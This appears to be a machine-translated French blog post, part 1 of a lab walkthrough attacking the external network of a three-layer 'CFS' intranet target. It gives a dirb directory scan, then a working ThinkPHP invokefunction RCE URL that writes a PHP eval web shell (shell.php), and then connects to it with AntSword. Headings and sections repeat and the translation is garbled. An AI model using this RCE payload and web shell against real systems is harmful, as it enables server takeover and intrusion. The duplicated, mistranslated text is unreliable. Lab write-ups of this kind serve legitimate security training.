Pénétration intranet à trois couches CFS - gestion de réseau externe (1)

Pénétration intranet à trois couches CFS-gestion de réseau externe (1)

2024-07-12

Table des matières

Faisons exploser d'abord pour voir s'il existe un moyen d'attaquer.

J'ai essayé le chemin suspect et j'ai découvert qu'il s'agissait du framework thinkphp. Je connaissais aussi la version, alors battons-nous le lendemain.

écrire en php

Modifiez et écrivez sur php avec succès, récupérez-le simplement le lendemain

Lien d'essai de l'épée fourmi rce

Géré avec succès

Gestion de réseau externe

Faisons exploser d'abord pour voir s'il existe un moyen d'attaquer.

Vous pouvez essayer dirsearch, dirb, gobuster et d'autres outils

dirb http://192.168.20.130/

J'ai essayé le chemin suspect et j'ai découvert qu'il s'agissait du framework thinkphp. Je connaissais aussi la version, alors battons-nous le lendemain.

écrire en php

http://192.168.20.130/public/index.php?s=/index/thinkapp/invokefunction&function=call_user_func_array&vars[0]=file_put_contents&vars[1][]=shell.php&vars[1][]=<?php @eval($_POST['cmd']);?>

Écrit avec succès en php, facile à obtenir.

http://192.168.20.130/public/shell.php

Partage de technologie

Pénétration intranet à trois couches CFS-gestion de réseau externe (1)

Gestion de réseau externe

Faisons exploser d'abord pour voir s'il existe un moyen d'attaquer.

J'ai essayé le chemin suspect et j'ai découvert qu'il s'agissait du framework thinkphp. Je connaissais aussi la version, alors battons-nous le lendemain.

écrire en php

Écrit avec succès en php, facile à obtenir.

Lien d'essai de l'épée fourmi rce

Géré avec succès

Profil personnel

mes coordonnées